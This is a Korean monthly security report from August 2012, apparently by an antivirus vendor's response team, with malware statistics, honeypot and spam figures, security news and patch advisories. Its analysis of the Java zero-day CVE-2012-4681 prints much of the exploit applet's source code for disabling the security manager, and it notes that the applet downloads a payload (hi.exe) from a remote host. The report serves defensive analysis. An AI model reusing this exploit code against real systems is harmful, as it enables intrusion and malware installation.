목차 Part Ⅰ 8 월의악성코드통계 악성코드통계... 3 (1) 감염악성코드 Top (2) 카테고리별악성코드유형... 4 (3) 카테고리별악성코드비율전월비교... 4 (4) 월별피해신고추이... 5 (5) 월별악성코드 DB 등록추이...

목차 Part Ⅰ 8 월의악성코드통계... 3 1. 악성코드통계... 3 (1) 감염악성코드 Top 15... 3 (2) 카테고리별악성코드유형... 4 (3) 카테고리별악성코드비율전월비교... 4 (4) 월별피해신고추이... 5 (5) 월별악성코드 DB 등록추이... 5 2. 악성코드이슈분석 CVE-2012-4681 JAVA Security Manager 우회취약점... 6 (1) 개요... 6 (2) 행위분석... 6 (3) 결론... 11 3. 허니팟 / 트래픽분석... 12 (1) 상위 Top 10 포트... 12 (2) 상위 Top 5 포트월별추이... 12 (3) 악성트래픽유입추이... 13 4. 스팸메일분석... 14 (1) 일별스팸및바이러스통계현황... 14 (2) 월별통계현황... 14 (3) 스팸메일내의악성코드현황... 15 Part Ⅱ 보안이슈돋보기... 16 1. 8 월의보안이슈... 16 2. 8 월의취약점이슈... 18 페이지 2

Part Ⅰ 8 월의악성코드통계 1. 악성코드통계 (1) 감염악성코드 Top 15 [2012년 8월 1일 ~ 2012년 8월 31일 ] 순위 악성코드진단명 카테고리 합계 ( 감염자수 ) 1 New Trojan.Patched.lpk Trojan 5,544 2 1 Spyware.OnlineGames.wsxp Spyware 5,150 3 10 Gen:Variant.Zusy.4661 Etc 3,730 4 New Exploit.CVE-2012-1889.Gen Exploit 3,680 5 New Trojan.Downloader.ATGG Trojan 3,519 6 New Variant.Zusy.4661 Etc 3,366 7 New Gen:Variant.Graftor.40591 Etc 2,454 8 New Trojan.alexa.SVC Trojan 2,425 9 New Trojan.Downloader.86016 Trojan 2,345 10 New Gen:Trojan.Heur.VP2.sm0@a0ZRvoli Trojan 2,315 11 New Gen:Trojan.Heur.VP2.sm0@auYERagi Trojan 2,310 12 New Adware.Kraddare.DC Adware 2,285 13 New Trojan.Script.455589 Trojan 2,237 14 New Gen:Variant.Graftor.Elzob.10671 Etc 1,962 15 New Trojan.Patched.usp10 Trojan 1,953 자체수집, 신고된사용자의감염통계를합산하여산출한순위임 감염악성코드 Top 15는사용자 PC에서탐지된악성코드를기반으로산출한통계입니다. 8월의감염악성코드 TOP 15에서는거의 1년만에 Spyware.OnlineGames.wsxp가 1위에서 2위로 내려왔습니다. 대신 그 자리를 Trojan.Patched.lpk가 차지했습니다. 새롭게 1위를 차지한 Trojan.Patched.lpk 악성코드는국내일부쉐어웨어들이유포하는사용자동의를받지않고추가적 인애드웨어를뿌리는형태로특히, 주말을이용하여많은유포행위를하고있습니다. 이악성코 드는추가적으로온라인게임계정탈취를시도하는악성코드도유포하므로사용자들의주의가필요 합니다. 그외에도 3위를차지한 Gen:Variant.Zusy.4661 악성코드도지난달에비해무려 10계단 상승했는데, 이악성코드는사용자가컴퓨터에서입력한값을저장하여공격자에게전달하는악 성코드로또다른온라인게임계정탈취의주범이기도합니다. 페이지 3

(2) 카테고리별악성코드유형 기타 (Etc) 26% 취약점 (Exploit) 8% 스파이웨어애드웨어 (Spyware) (Adware) 11% 5% 트로이목마 (Trojan) 50% 트로이목마 (Trojan) 스파이웨어 (Spyware) 애드웨어 (Adware) 취약점 (Exploit) 웜 (Worm) 기타 (Etc) 백도어 (Backdoor) 바이러스 (Virus) 하이재커 (Hijacker) 호스트파일 (Host) 악성코드유형별비율에서트로이목마 (Trojan) 유형이가장많은 50% 를차지했으며, 기타악성코드 (Etc) 유형이 26% 로그뒤를차지했습니다. 스파이웨어의비중은 11% 입니다. (3) 카테고리별악성코드비율전월비교 트로이목마 (Trojan) 스파이웨어 (Spyware) 애드웨어 (Adware) 하이재커 (Hijacker) 웜 (Worm) 취약점 (Exploit) 바이러스 (Virus) 백도어 (Backdoor) 호스트파일 (Host) 기타 (Etc) 19% 11% 5% 5% 0% 0% 0% 0% 0% 8% 0% 0% 0% 0% 5% 0% 23% 26% 48% 50% 7 월 8 월 0% 20% 40% 60% 80% 100% 8월에는 7월과비교하여트로이목마 (Trojan) 유형의악성코드비중이 48% 에서 50% 로소폭상승하였으며기타 (Etc) 유형의악성코드의비중도전월에비해약간증가하였습니다. 그외메모리변조를통해원격코드를실행가능한 CVE-2012-1889 취약점을노린공격이급증하였습니다. 페이지 4

(4) 월별피해신고추이 [2011 년 9 월 ~ 2012 년 8 월 ] 9 월 10 월 11 월 12 월 1 월 2 월 3 월 4 월 5 월 6 월 7 월 8 월 알약사용자의신고를합산에서산출한결과임월별피해신고추이는알약사용자의신고를합산해서산출한결과로써, 월별신고건수를나타내는그래프입니다. 알약 2.0의신고기능에의해접수된피해문의신고는휴가철등의영향으로 7월에잠시내려갔던수치가 8월에들어 20% 가량다시증가하였습니다. (5) 월별악성코드 DB 등록추이 [2011 년 9 월 ~ 2012 년 8 월 ] 201109 201110 201111 201112 201201 201202 201203 201204 201205 201206 201207 201208 Adware Spyware Hijacker KeyLogger Exploit RAT Trojan Worm Backdoor Downloader Dropper Misc 페이지 5

Part Ⅰ 8 월의악성코드통계 2. 악성코드이슈분석 CVE-2012-4681 JAVA Security Manager 우회취약점 (1) 개요 8월 26일보안업체 FireEye에서블로그 "ZERO-DAY SEASON IS NOT OVER YET" 를통해오라클 (Orcle) 자바 JRE(Java Runtime Environment) 7에서임의의코드를실행할수있는코드실행취약점 (CVE-2012-4681) 을공개하였다. 해당자바 JRE 취약점은 ORACLE에서보안취약점을제거할수있는보안패치를제공하지않아제로데이 (Zero-Day, 0-Day) 취약점으로각별한주의가필요하다. 자바 JRE 관련 Zero-DAY 취약점의영향을받는소프트웨어는다음과같다. Oracle Java 7 (1.7, 1.7.0) Java Platform Standard Edition 7 (Java SE 7) Java SE Development Kit (JDK 7) Java SE Runtime Environment (JRE 7) (2) 행위분석 이스크립트는 Dadong's JSXX 0.44 VIP 변조방지스크립트기술을사용하여난독화를사용하고있다. 중국에서제작된것으로 Dadong 이라고도알려져있으며난독화기법으로자주사용된다. < 그림 1. 난독화된코드 > 페이지 6

Dadong 난독화스크립트의가장큰특징은변조방지코드이다. 스크립트에문자삽입또는문자변경, 문자전환값추가, 빼기등등을하게되면모두실패하여실행되지않는다. 스크립트의난독화는변수에저장이되어실행되면난독화변수를읽고각문자를 10진수로바꾸며이후표현식등으로몇가지복잡한계산을수행하여복호화하게된다. 복호화하면하나의 JAVA 애플릿을호출하는것을볼수있다. < 그림 2. 복호화된코드 > 이애플릿에는두개의클래스로구성되어있으며 Gonvv 클래스에 CVE-2012-4681 취약점 으로 Zero-Day 공격을포함하는클래스이고 Gondzz 클래스에서는바이너리파일을다운로 드이후실행한다. < 그림 3. 애플릿구성 > 페이지 7

import java.applet.applet; import java.awt.graphics; import java.beans.expression; import java.beans.statement; import java.lang.reflect.field; import java.net.url; import java.security.accesscontrolcontext; import java.security.allpermission; import java.security.codesource; import java.security.permissions; import java.security.protectiondomain; import java.security.cert.certificate; public class Gondvv extends Applet { public void disablesecurity() throws Throwable { // localstatement에인자를모든액세스권한 ( 접근권한 ) 을넣는다. Statement localstatement = new Statement(System.class, "setsecuritymanager", new Object[1]); Permissions localpermissions = new Permissions(); localpermissions.add(new AllPermission()); ProtectionDomain localprotectiondomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localpermissions); AccessControlContext localaccesscontrolcontext = new AccessControlContext(new ProtectionDomain[] { localprotectiondomain }); // localaccesscontrolcontext 는모든실행권한을표현한다. 해당소스를풀어쓰면아래와같이 표현된다. // sun.awt.suntoolkit.getfield(statement, acc ).set(localstatement, localaccesscontrolcontext); SetField(Statement.class, "acc", localstatement, localaccesscontrolcontext); // localstatement 가실질적으로 System.setSecurityManager() 를실행하는명령이다. } localstatement.execute(); 페이지 8

private Class GetClass(String paramstring) throws Throwable { Object[] arrayofobject = new Object[1]; arrayofobject[0] = paramstring; Expression localexpression = new Expression(Class.class, "forname", arrayofobject); localexpression.execute(); // Class.forName( sun.awt.suntoolkit ); 으로풀어쓸수있다. } return (Class)localExpression.getValue(); private void SetField(Class paramclass, String paramstring, Object paramobject1, Object paramobject2) throws Throwable { Object[] arrayofobject = new Object[2]; arrayofobject[0] = paramclass; arrayofobject[1] = paramstring; Expression localexpression = new Expression(GetClass("sun.awt.SunToolkit"), "getfield", arrayofobject); // sun.awt.suntoolkit.getfield(paramclass, paramstring); 으로풀어쓸수있다. localexpression.execute(); ((Field)localExpression.getValue()).set(paramObject1, paramobject2); // sun.awt.suntoolkit.getfield(paramclass, paramstring).set(paramobject1, paramobject2); 으로풀어쓸수있다. } public void init() { try { disablesecurity(); // 최종적으로 disablesecurity(); 으로모든실행권한을받아 Security를해제하게된다. String s1 = getparameter("bn"); String s = getparameter("xiaomaolv"); 이하생략 < 표 1. 소스코드분석 > 페이지 9

localaccesscontrolcontext변수는모든실행권한을뜻하는권한의인스턴스로정의된다. 소스코드분석처럼 Sun.awt.SunToolkit의 getfield() 메소드에취약점이있어서문제가발생하는데, 즉 localstatement는 setsecuritymanager 문장을실행하는명령으로여기에 sun.awt.suntoolkit.getfield 를이용하여인자값체크없이인자를넣을수있다는취약점이다. 정상적으로는 System.setSecutityManager( 모든실행권한 ) 으론실행할수없지만, System.setSecutityManager( 어떤 ) 와같은행동을하는 Statement 클래스를만들어 sun.awt.suntoolkit.getfield(statement, acc ).set(localstatement, localaccesscontrolcontext); 으로모든실행권한이라는인자를우회하여넣어 localstatement.execute(); 를실행함으로결과적으로모든실행권한을가지게된다. 해당스크립트문은자바 JRE 취약점 (CVE-2012-4681) 으로 http://xxxx.net/hi.exe 을다운로 드한다. File Name MD5 Size hi.exe 4A55BF1448262BF71707EEF7FC168F7D 16,896 Bite %System32%mspmsnsv.dll 2F8AC36B4038B5FD7EFAD8F1206C01E2 10,240 Bite < 그림 4. Hi.exe 와 mspmsnsv.dll 정보 > 페이지 10

다운로드받은 hi.exe 를최초실행시 C:\WINDOWS\system32\ 에 mspmsnsv.dll 파일을 생성하게된다. 인젝션이성공하게되면특정도메인으로접속을요청하며접속성공시키로깅등의공 격자가의도하는공격기능을수행하는것으로추정된다. ( 분석시점접속불가능 ) (3) 결론 제로데이공격은보안취약점이발견되었을때문제에대한해결방법이알려지기전에이루어지는공격을의미하는것으로, 일반적으로컴퓨터에서취약점이발견되면제작자나개발자가취약점을보완하는패치를배포하고사용자가이를내려받아대처하는것이관례이다. 이취약점은제로데이상태로발표되었다. 현재는, Oracle 에서이취약점에대한패치를게시하고업데이트를권고하고있다. http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681- 1835715.html#PatchTable 페이지 11

Part Ⅰ 8 월의악성코드통계 3. 허니팟 / 트래픽분석 (1) 상위 Top 10 포트 3389 1% 23 1% 1433 1% 3306 21 4% 21 1433 3389 23 8080 3306 93% 1080 4899 5900 25 (2) 상위 Top 5 포트월별추이 [2012 년 06 월 ~ 2012 년 08 월 ] 2012 년 8 월 2012 년 7 월 2012 년 6 월 3306 1433 1080 110 21 페이지 12

(3) 악성트래픽유입추이 [2012 년 03 월 ~ 2012 년 08 월 ] 2012 년 3 월 2012 년 4 월 2012 년 5 월 2012 년 6 월 2012 년 7 월 2012 년 8 월 페이지 13

2012-8-1 2012-8-3 2012-8-5 2012-8-7 2012-8-9 2012-8-11 2012-8-13 2012-8-15 2012-8-17 2012-8-19 2012-8-21 2012-8-23 2012-8-25 2012-8-27 2012-8-29 2012-8-31 Part Ⅰ 8 월의악성코드통계 4. 스팸메일분석 (1) 일별스팸및바이러스통계현황 60,000 50,000 40,000 30,000 20,000 10,000 바이러스 스팸 0 일별스팸및바이러스통계현황그래프는하루에유입되는바이러스및스팸메일의개수를나타내는그래프입니다. 8월의경우 7월에비해바이러스가포함된메일통계수치는약 30% 가량대폭감소하였습니다. 수집된스팸메일의통계수치의경우 7월에비해 8월통계가약 20% 가까이증가하였습니다. (2) 월별통계현황 [2012 년 03 월 ~ 2012 년 08 월 ] 800,000 700,000 2.1% 600,000 500,000 4.1% 400,000 300,000 200,000 100,000 4.7% 95.3 97.9 95.9 5.5% 94.5 4.8% 3.0% 95.2 97.0 바이러스 스팸 0 3 월 4 월 5 월 6 월 7 월 8 월 월별통계현황은전체악성메일중단순스팸메일과악성코드첨부메일의각비율을나타내는 그래프입니다. 8 월에는스팸메일이 97.0%, 바이러스첨부메일이 3.0% 의비율로수신된것으로 나타났습니다. 페이지 14

(3) 스팸메일내의악성코드현황 [2012 년 8 월 1 일 ~ 2012 년 8 월 31 일 ]ff 순위 악성코드진단명 메일수 [ 개 ] 비율 [%] 1 W32/Mytob-C 2,527 24.90% 2 W32/MyDoom-H 1,453 14.32% 3 Mal/ZipMal-B 923 9.10% 4 W32/MyDoom-N 412 4.06% 5 Troj/Invo-Zip 379 3.74% 6 W32/Virut-T 339 3.34% 7 Mal/BredoZp-B 312 3.07% 8 W32/Bagle-CF 122 1.20% 9 W32/Mytob-G 120 1.18% 10 W32/Netsky-P 93 0.92% 스팸메일내의악성코드현황은 8월한달동안수신된메일에서발견된악성코드중 Top 10을뽑은그래프입니다. 현재 W32/Mytob-C가 24.90% 로비율이지난달에비해약간감소하였으나 4달연속으로 1위를차지하고있으며, 2위는 14.32% 를차지한 W32/MyDoom-H, 3위는 9.10% 를차지한 Mal/ZipMal-B입니다. 2위와 3위역시비율의변화는있었으나지난달과동일한순위를보이고있습니다. 8월에유입된스팸메일수는 7 월에비해약 20% 가까이증가하였습니다. 페이지 15

Part Ⅱ 보안이슈돋보기 1. 8 월의보안이슈 구글플레이스토어의앱등록정책이까다롭게바뀌었습니다. 그밖에중소기업들홈페이지취약점, 가우스 악성코드발견, 소스코드보안관심건등이 8월의이슈가되었습니다. 구글플레이, 애플앱스토어 수준으로엄격한어플정책적용최근구글플레이에는악성코드가심어져있는어플들이대량으로유포되고있으며, 상태의심각성을느낀구글은각종부분에서정책의변화를진행하였습니다. 새로운정책은 8 월 1일자로적용되었으며, 정책을위반한어플에대해서는 30일간의수정기간이부여되며, 만약미수정시구글플레이에서퇴출됩니다. 중소기업홈페이지, 디렉토리리스팅취약점에무방비? 최근전력, 에너지관련기업 A사웹사이트에서디렉토리리스팅취약점이발견되었습니다. 디렉토리리스팅취약점은관리자권한을가지지않아도관리자만이볼수있는세부내용및관련자료를열람할수있으며, 더나아가게시물을수정및악성태그를삽입할수도있는취약점입니다. 이러한취약점은관리자의실수나부주의로일어나는취약점이지만, 그로인해일어날수있는보안위협은상당이치명적인만큼, 중소기업은홈페이지관리및보안측면에더많은관심을두어야합니다. 신종악성코드 가우스 발견최초의사이버무기로알려진스턱스넷에이어듀큐, 플레임의계보를잇는악성코드가우스가발견되었습니다. 가우스는중동지역, 특히레바논에서주로발견되었으며, 이미수천대의 PC가감염된것으로파악되었습니다. 가우스는플레임과동일한플랫폼을쓰고, 모듈구조로이루어져있는공통점이있어, 전문가들은플레임악성코드를제작한세력이만든것으로추정하고있습니다. 가우스에대한자세한연구는아직진행중입니다. 정보통신망법개정안시행온라인사업자들의주민등록번호수집, 활용금지를골자로하는 정보통신망이용촉진및정보보호에관한법률 이시행되었습니다. 이로서온라인사업자들은영리목적의사업에주민등록번호를수집하거나이용할수없습니다. 하지만여전히예외조항이많고불이행시처벌범위가모호하여실표성논란도예상되고있습니다. 또한 6개월간의계도기간동안법령을어길시처벌이어려운점을이용하여, 대다수의인터넷업체들이이기간동안주민등록번호활용을지속할것으로보이는만큼모니터링방안도시급합니다. 中서모바일악성코드 SMS좀비 발견중국에서 SMS좀비 악성코드가유행하고있습니다. 이악성코드는 50만대의안드로이드폰을감염시켰습니다. 이악성코드를실행하게되면, 해커는계정을탈취하여각종민감한정보를알아낼수있으며, 원격조정을할수도있습니다. 주로중국에서퍼지고있는 페이지 16

악성코드인만큼국내사용자들은크게염려할부분은아니지만, 50 만대가넘는폰이하 나의악성코드에감염된사례가극히드문만큼, 되도록이면믿을만한앱스토어를이용 하는것이바람직합니다. 소스코드보안 주목 행정안전부가예고한정보시스템구축, 운영지칭개정안에따르면, 2012년 12월부터행정기관및공공기관은개발보안을적용해야하며, 의무대상은지속적으로확대돼 2015년부터는감리대상전정보화사업에소프트웨어개발보안을적용해야합니다. 개발보안은소프트웨어개발단계에서취약점발생요인을사전제거함으로써보안의위험을낮추는것입니다. 이러한소스코드보안이의무화됨은단순히취약점을발견하고방어하는데그치지않고, 애플리케이션의라이프사이클전반을관리함으로서보다효율적인애플리케이션보안을기대할수있을것입니다. 언론, 기업등 APT 악성코드다량유포국내유명언론사, 파일공유서비스, 부동산사이트, 연예기획사등접속자가많은인터넷사이트에지능형지속위협 (APT) 악성코드가다량유포되었습니다. 해당악성코드는마이크로소프트 XML, 자바의복합적인취약점을이용한공격이며, 루트킷으로 SSDT후킹, 백신업데이트를방해합니다. 하지만취약점을이용한공격인만큼각종어플리케이션과윈도우업데이트를꾸준히하여최신버전으로유지한다면, 이러한악성코드에서비교적안전할수있습니다. 페이지 17

2. 8 월의취약점이슈 Internet Explorer 누적보안업데이트, 원격데스크톱에서발생하는취약점으로인한원격코드실행문제, MS Office에서발생하는취약점으로인한원격코드실행문제, JScript 및 VBScript 엔진에서발생하는취약점으로인한원격코드실행문제해결등을포함한 Microsoft 8월정기보안업데이트가발표되었습니다. Internet Explorer 누적보안업데이트 (2722913) 이보안업데이트는 Internet Explorer에서발견되어비공개적으로보고된취약점 4건을해결합니다. 가장위험한취약점으로인해사용자가 Internet Explorer를사용하여특수하게조작된웹페이지를볼경우원격코드실행이허용될수있습니다. 이러한취약점중하나를성공적으로악용한공격자는현재사용자와동일한권한을얻을수있습니다. 시스템에대한사용자권한이적게구성된계정의사용자는관리자권한으로작업하는사용자에비해영향을적게받습니다. 원격데스크톱의취약점으로인한원격코드실행문제점 (2723135) 이보안업데이트는원격데스크톱프로토콜의비공개적으로보고된취약점을해결합니다. 공격자가영향을받는시스템에특수하게조작된일련의 RDP 패킷을보낼경우이취약점으로인해원격코드실행이허용될수있습니다. 기본적으로 RDP( 원격데스크톱프로토콜 ) 은모든 Windows 운영체제에서사용되도록설정되어있지는않습니다. RDP가사용가능하지않는시스템은취약하지않습니다. Windows Networking Components의취약점으로인한원격코드실행문제점 (2733594) 이보안업데이트는 Microsoft Windows에서발견되어비공개적으로보고된취약점 4건을해결합니다. 이중가장심각한취약점으로인해공격자가특수하게조작된응답을 Windows 인쇄스풀러요청에전송할경우원격코드실행이허용될수있습니다. 최선의방화벽구성방법과표준기본방화벽구성을이용하면기업경계외부에서들어오는공격으로부터네트워크를보호할수있습니다. 인터넷과직접연결되는시스템의경우필요한포트만최소한으로열어두는것이안전합니다. Windows 공용컨트롤의취약점으로인한원격코드실행문제점 (2720573) 이보안업데이트는 Windows 공용컨트롤의비공개적으로보고된취약점을해결합니다. 이취약점으로인해사용자가취약점을악용하도록설계된특수하게조작된콘텐츠가포함된웹사이트를방문할경우원격코드실행이허용될수있습니다. 그러나어떠한경우에도공격자는강제로사용자가이러한웹사이트를방문하도록만들수없습니다. 대신공격자는사용자가전자메일메시지또는인스턴트메신저메시지의링크를클릭하여공격자의웹사이트를방문하도록유도하는것이일반적입니다. 악성파일은전자메일첨부파일로도전송될수있지만공격자가이취약점을악용하려면사용자가첨부파일을열도록유도해야합니다. 페이지 18

Microsoft Exchange Server WebReady 문서보기가원격코드실행을허용할수있는취약점 (2740358) 이보안업데이트는 Microsoft Exchange Server WebReady 문서보기의공개된취약점을해결합니다. 이취약점은사용자가 OWA(Outlook Web App) 를사용하여특수하게조작된파일을미리보는경우 Exchange 서버에있는코드변환서비스의보안컨텍스트에서원격코드를실행하도록허용할수있습니다. WebReady 문서보기에사용되는 Exchange에있는코드변환서비스는 LocalService 계정에서실행되고있습니다. LocalService 계정에는로컬컴퓨터의최소권한이있으며네트워크에서익명자격증명을제시합니다. Windows 커널모드드라이버의취약점으로인한권한상승문제점 (2731847) 이보안업데이트는비공개적으로보고된 Microsoft Windows의취약점 1건을해결합니다. 공격자가시스템에로그온하고특수하게조작된응용프로그램을실행할경우이취약점으로인해권한상승이허용될수있습니다. 이취약점을악용하려면공격자가유효한로그온자격증명을가지고로컬로로그온할수있어야합니다. JScript 및 VBScript 엔진의취약점으로인한원격코드실행취약점 (2706045) 이보안업데이트는 64비트버전 Microsoft Windows에서실행되는 JScript 및 VBScript 스크립팅엔진의비공개적으로보고된취약점을해결합니다. 이취약점으로인해사용자가특수하게조작된웹사이트를방문할경우원격코드실행이허용될수있습니다. 공격자는강제로사용자가웹사이트를방문하도록할수없습니다. 대신공격자는사용자가전자메일메시지또는인스턴트메신저메시지의링크를클릭하여공격자의웹사이트를방문하도록유도하는것이일반적입니다. Microsoft Office의취약점으로인한원격코드실행문제점 (2731879) 이보안업데이트는비공개적으로보고된 Microsoft Office의취약점 1건을해결합니다. 사용자가특수하게조작된파일을열거나특수하게조작된 CGM(Computer Graphics Metafile) 그래픽파일을 Office 파일에포함하는경우이취약점으로인해원격코드실행이허용될수있습니다. 취약점악용에성공한공격자는현재사용자와동일한권한을얻을수있습니다. 시스템에대한사용자권한이적게구성된계정의사용자는관리자권한으로작업하는사용자에비해영향을적게받습니다. Microsoft Visio의취약점으로인한원격코드실행문제점 (2733918) 이보안업데이트는비공개적으로보고된 Microsoft Office의취약점을해결합니다. 이러한취약점으로인해사용자가특수하게조작된 Visio 파일을열경우원격코드실행이허용될수있습니다. 취약점악용에성공한공격자는현재사용자와동일한권한을얻을수있습니다. 시스템에대한사용자권한이적게구성된계정의사용자는관리자권한으로작업하는사용자에비해영향을적게받습니다. 페이지 19

< 해결책 > Windows Update를수행하거나 Microsoft 보안공지요약사이트에서해당취약점들의개별적인패치파일을다운로드받을수있습니다. 한글 : http://technet.microsoft.com/ko-kr/security/bulletin/ms12-aug 영문 : http://technet.microsoft.com/en-us/security/bulletin/ms12-aug Adobe Reader/Acrobat 신규취약점보안업데이트권고 Adobe 社는 Adobe Reader와 Acrobat에영향을주는취약점을해결한보안업데이트를발표했습니다. 낮은버전의 Adobe Reader/Acrobat 사용자는악성코드감염에취약할수있으므로해결방안에따라최신버전으로업데이트하시기바랍니다. 임의코드실행으로이어질수있는스텍오버플로우취약점 (CVE-2012-2049) 임의코드실행으로이어질수있는버퍼오버플로우취약점 (CVE-2012-2050) 임의코드실행으로이어질수있는메모리손상취약점 (CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE- 2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, CVE-2012-4160) 임의코드실행으로이어질수있는힙오버플로우취약점 (CVE-2012-1525) 매킨토시환경에서임의코드실행으로이어질수있는메모리손상취약점 (CVE-2012-4161, CVE-2012-4162) < 해당제품 > 윈도우, 매킨토시환경에서동작하는 Adobe Reader/Acrobat X (10.1.3) 및이하버전 윈도우, 매킨토시환경에서동작하는 Adobe Reader/Acrobat 9.5.1 및 9.x 이하버전 < 해결방법 > Adobe Reader 사용자 : Adobe Download Center를방문하여최신버전을설치하거나 [ 메뉴 ] [ 도움말 ] [ 업데이트확인 ] 을이용하여업그레이드 - 윈도우환경에서동작하는 Adobe Reader 사용자 : http://www.adobe.com/support/downloads/product.jsp?product=10&platform=windows Adobe Acrobat 사용자 : Adobe Download Center를방문하여최신버전을설치하거나 [ 메뉴 ] [ 도움말 ] [ 업데이트확인 ] 을이용하여업그레이드 - 윈도우환경에서동작하는 Adobe Acrobat Standard/Pro 사용자 : http://www.adobe.com/support/downloads/product.jsp?product=1&platform=windows 페이지 20

< 참고사이트 > http://www.adobe.com/support/security/bulletins/apsb12-16.html Adobe Shockwave Player 취약점업데이트권고 Adobe 社는 Shockwave Player에발생하는코드실행취약점을해결한보안업데이트발표했습니다. 낮은버전의 Adobe Shockwave Player 사용자는악성코드감염에취약할수있으므로해결방안에따라최신버전으로업데이트하시기바랍니다.. 코드실행으로이어질수있는메모리손상취약점 (CVE-2012-2043, CVE-2012-2044, CVE-2012-2045, CVE-2012-2046, CVE-2012-2047) < 해당제품 > 윈도우, 매킨토시환경에서동작하는 Adobe Shockwave Player 11.6.5.635 및이하버전 < 해결방법 > Adobe Shockwave Player 11.6.5.635 이하버전사용자 : Adobe Download Center(http://get.adobe.com/shockwave) 에방문하여 11.6.6.636 버전을설치하거나자동업데이트를이용하여업그레이드하시기바랍니다. < 참고사이트 > http://www.adobe.com/support/security/bulletins/apsb12-17.html Adobe Flash Player 취약점보안업데이트권고 Adobe 社는 Adobe Flash Player에발생하는취약점을해결한보안업데이트를발표했습니다. 공격자는취약점을이용하여시스템을멈추거나시스템의제어권한을획득할수있으므로해결방법에따라최신버전으로업데이트하시기바랍니다. < 해당제품 > Adobe Flash Player 가설치된모든플랫폼 < 해결방법 > 윈도우, 매킨토시환경의 Adobe Flash Player 11.3.300.271 및이전버전사용자 - Adobe Flash Player Download Center(http://get.adobe.com/kr/flashplayer/) 에방문하여 Adobe Flash Player 11.4.402.265버전을설치하거나자동업데이트를이용하여업그레이드 리눅스환경의 Adobe Flash Player 11.2.202.236 및이전버전사용자 페이지 21

- Adobe Flash Player Download Center(http://get.adobe.com/kr/flashplayer/) 에방문하여 Adobe Flash Player 11.2.202.238 버전을설치 안드로이드 4.x 환경에서동작하는 Adobe Flash Player 11.1.115.11 및이전버전사용자 - 장비업데이트를통해 Adobe Flash Player 11.1.115.17 버전을설치 안드로이드 3.x 환경에서동작하는 Adobe Flash Player 11.1.111.10 및이전버전사용자 - 장비업데이트를통해 Adobe Flash Player 11.1.111.16 버전을설치 윈도우, 매킨토시환경의 Adobe AIR 3.3.0.3670 버전사용자 - Adobe AIR Download Center(http://get.adobe.com/kr/air) 에방문하여 Adobe AIR 3.4.0.2540 버전을설치 ios 용 AIR를포함한모든 AIR 3.3.0.3690 SDK 버전사용자 - Adobe AIR Developer Center (http://www.adobe.com/devnet/air/air-sdk-download.html) 에방문하여 Adobe AIR 3.4.0.2540 SDK 버전을설치 안드로이드환경에서동작하는 Adobe AIR 3.3.0.3650 및이전버전사용자 - 안드로이드장비에서 Google Play 또는 Amazon Marketplace 검색을통해 Adobe AIR 3.4.0.2540 버전을설치 < 참고사이트 > http://www.adobe.com/support/security/bulletins/apsb12-19.html https://play.google.com/store/apps/details?id=com.adobe.air http://www.amazon.com/adobe-systems- AIR/dp/B004SRNH10/ref=sr_1_6?ie=UTF8&qid=1339095848&sr=8-6 Oracle Java JRE 신규취약점업데이트권고오라클社의 Java JRE에서원격코드실행이가능한취약점이발견되었습니다. 공격자는웹게시, 스팸메일, 메신저의링크등을통해특수하게조작된 Java애플릿을로드하는 HTML 파일을사용자가열어보도록유도하여악성코드를유포할수있습니다. 해당취약점을악용한공격코드가유포되고있으므로취약한버전사용자는반드시최신버전으로업데이트하시기바랍니다. < 해당제품 > JDK / JRE 7 Update 6 및이전버전 JDK / JRE 6 Update 34 및이전버전 < 해결방법 > [ 제어판 ] - [ 프로그램 ] - [JAVA] - [ 업데이트 ] 탭 - [ 지금업데이트 ] 클릭하여업데이트진행 JAVA 가설치가되어있지않은경우, [JAVA] 가표시되지않으며업데이트를할필요가없음. 페이지 22

또는아래의주소로이동하여설치된버전에따라최신의 JDK 또는 JRE 를설치 http://www.oracle.com/technetwork/java/javase/downloads/index.html < 참고사이트 > http://www.krcert.or.kr/kor/data/secnoticeview.jsp?p_bulletin_writing_sequence=1246 http://www.us-cert.gov/cas/techalerts/ta12-240a.html http://www.kb.cert.org/vuls/id/636312 http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html http://www.oracle.com/technetwork/java/javase/downloads/index.html http://www.java.com/ko/download/help/java_update.xml 페이지 23

Contact us 이스트소프트알약대응팀 Tel : 02-3470-2999 E-mail : help@alyac.co.kr : 알약홈페이지 : www.alyac.co.kr http://advert.estsoft.com/?event=201111181660299 페이지 24